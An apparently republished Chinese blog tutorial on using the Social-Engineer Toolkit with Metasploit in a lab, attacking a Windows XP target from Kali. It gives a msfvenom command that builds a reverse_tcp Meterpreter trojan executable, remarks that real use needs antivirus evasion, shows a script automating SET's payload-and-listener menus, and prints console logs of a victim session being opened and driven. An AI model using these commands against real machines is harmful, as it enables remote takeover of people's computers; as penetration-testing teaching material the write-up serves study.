java中的接口是类吗
531
2022-10-02
Metasploit之——社会工程学工具包(metasploit下载安装)
社会工程学工具包(Social Engineering Toolkit, SET)是一套基于Python语言的工具集合,主要面向对人进行的渗透测试。使用SET可以实现多种攻击,比如:网络钓鱼攻击、网页劫持攻击、格式文件攻击等。
这里,我们同样以一个实际案例来进行说明。
攻击机 Kali 192.168.175.128
靶机 WinXP 192.168.175.130
1.生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.175.128 lport=4444 -f exe -o shell.exe
注意:实际过程中,需要多exe木马进行免杀防护。
2.将木马上传到靶机
实际中,我们需要将靶机进行一系列的渗透之后,拿到靶机的系统权限,将木马上传或者下载到靶机。这里只是一个示例,我就直接将exe木马拷贝到靶机中了。
3.编写社会工程学脚本se-script
这里,我们将目录切换到Kali下的/usr/share/set目录下。
在此目录下,创建脚本文件se-script,内容如下:
142192.168.175.1284444yes
注意:这个脚本的第一行为空行
如下图所示:
4.安装社会工程学工具包
注意:第一次使用Kali下的社会工程学工具包的时候,需要将目录切换到/usr/share/set目录下后,执行如下命令进行安装:
./setup.py install
如果已经执行过安装命令,则此步骤可忽略。
5.运行社会工程学脚本se-script
这里,我们在Kali的/usr/share/set目录下输入如下命令:
./seautomate se-script
具体如下:
root@binghe:/usr/share/set# ./seautomate se-script ..######..########.######## .##....##.##..........##... .##.......##..........##... ..######..######......##... .......##.##..........##... .##....##.##..........##... ..######..########....##... [---] The Social-Engineer Toolkit (SET) [---][---] Created by: David Kennedy (ReL1K) [---] Version: 7.7.9 Codename: 'Blackout'[---] Follow us on Twitter: @TrustedSec [---][---] Follow me on Twitter: @HackingDave [---][---] Homepage: [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: It's easy to update using the PenTesters Framework! (PTF)Visit to update all your tools! Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu.set> 4 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter 8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter 9) Download/Run your Own Executable Downloads an executable and runs itset:payloads>2set:payloads> IP address for the payload listener (LHOST):192.168.175.128set:payloads> Enter the PORT for the reverse listener:4444[*] Generating the payload.. please be patient.yes[*] Payload has been exported to the default SET directory located under: /root/.set/payload.exeset:payloads> Do you want to start the payload and listener now? (yes/no):[*] Launching msfconsole, this could take a few to load. Be patient... _---------. .' ####### ;." .---,. ;@ @@`; .---,..." @@@@@'.,'@@ @@@@@',.'@@@@ ".'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/ =[ metasploit v5.0.1-dev ]+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post ]+ -- --=[ 541 payloads - 44 encoders - 10 nops ]+ -- --=[ 2 evasion ]+ -- --=[ ** This is Metasploit 5 development branch ** ][*] Processing /root/.set/meta_config for ERB directives.resource (/root/.set/meta_config)> use multi/handlerresource (/root/.set/meta_config)> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpresource (/root/.set/meta_config)> set LHOST 192.168.175.128LHOST => 192.168.175.128resource (/root/.set/meta_config)> set LPORT 4444LPORT => 4444resource (/root/.set/meta_config)> set ExitOnSession falseExitOnSession => falseresource (/root/.set/meta_config)> exploit -j[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.175.128:4444 msf5 exploit(multi/handler) >
输入的内容比较多,由输出的内容可知:SET工具包,将脚本文件se-script中的每一行内容都当做相应的参数设置到框架中了,同时自动启动了Metasploit框架进行监听。
切换到Kali命令行后,看到如下输出:
msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.175.130[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1100) at 2019-01-27 14:41:13 +0800此时我们按下回车,并输入sessions命令msf5 exploit(multi/handler) > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows LIUYAZHUANG\lyz @ LIUYAZHUANG 192.168.175.128:4444 -> 192.168.175.130:1100 (192.168.175.130)
可以看到靶机和攻击机之间建立了Meterpreter连接。
接着,我们输入sessions -i 1 命令进入Meterpreter命令行,具体如下:
msf5 exploit(multi/handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > ipconfigInterface 1============Name : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU : 1520IPv4 Address : 127.0.0.1Interface 2============Name : AMD PCNET Family PCI Ethernet Adapter - rfaceHardware MAC : 00:0c:29:5d:8e:d4MTU : 1500IPv4 Address : 192.168.175.130IPv4 Netmask : 255.255.255.0meterpreter >
可见,我们已经利用社会工程学工具包,顺利拿下了目标机的Meterpreter权限。
接下来,我们就分析一下,SET框架是如何和se-script脚本中的参数进行关联的。
6.分析SET框架与se-script脚本的关系
在第5步中,我们只是输入了./seautomate se-script 命令,然后双击了exe木马文件,就拿到了靶机的meterpreter权限。这一切都是SET框架自动执行的结果,那么SET框架是如何自动执行的呢?下面我们就具体分析这个过程。
在分析的过程中,我们手动执行SET框架的每一个步骤,然后对比我们的脚本文件se-script中的内容。
6-1.启动SET框架
在/usr/share/set目录下输入命令:
./setoolkit
启动SET框架
6-2.选择攻击菜单
这里,我们选择1,社会工程学攻击
6-2.选择攻击方式
这里,选择4,创建一个Payload和Listener。
6-3.选择攻击载荷
这里选择2,Windows Reverse_TCP Meterpreter
6-4.设置监听IP和端口
6-5.是否立即启动
这里,询问是否立即启动攻击载荷和监听配置,这里输入yes
此时,便进入了Metasploit命令行
此时,我们双击下靶机上的exe木马,命令行输出如下信息:
[*] Started reverse TCP handler on 192.168.175.128:4444 msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.175.130[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1105) at 2019-01-27 15:03:32 +0800msf5 exploit(multi/handler) > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows LIUYAZHUANG\lyz @ LIUYAZHUANG 192.168.175.128:4444 -> 192.168.175.130:1105 (192.168.175.130)
如下图:
此时,我们输入sessions -i 1进入Meterpreter命令行。
此时,我们同样拿下了靶机的Meterpreter权限。
6-6.对比分析
在我们手动启动SET进行攻击的时候,依次输入了:1->4->2->192.168.175.128->4444-yes
再来看我们的se-script脚本:
正好一一对应,
注意:脚本的第一行为空行。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~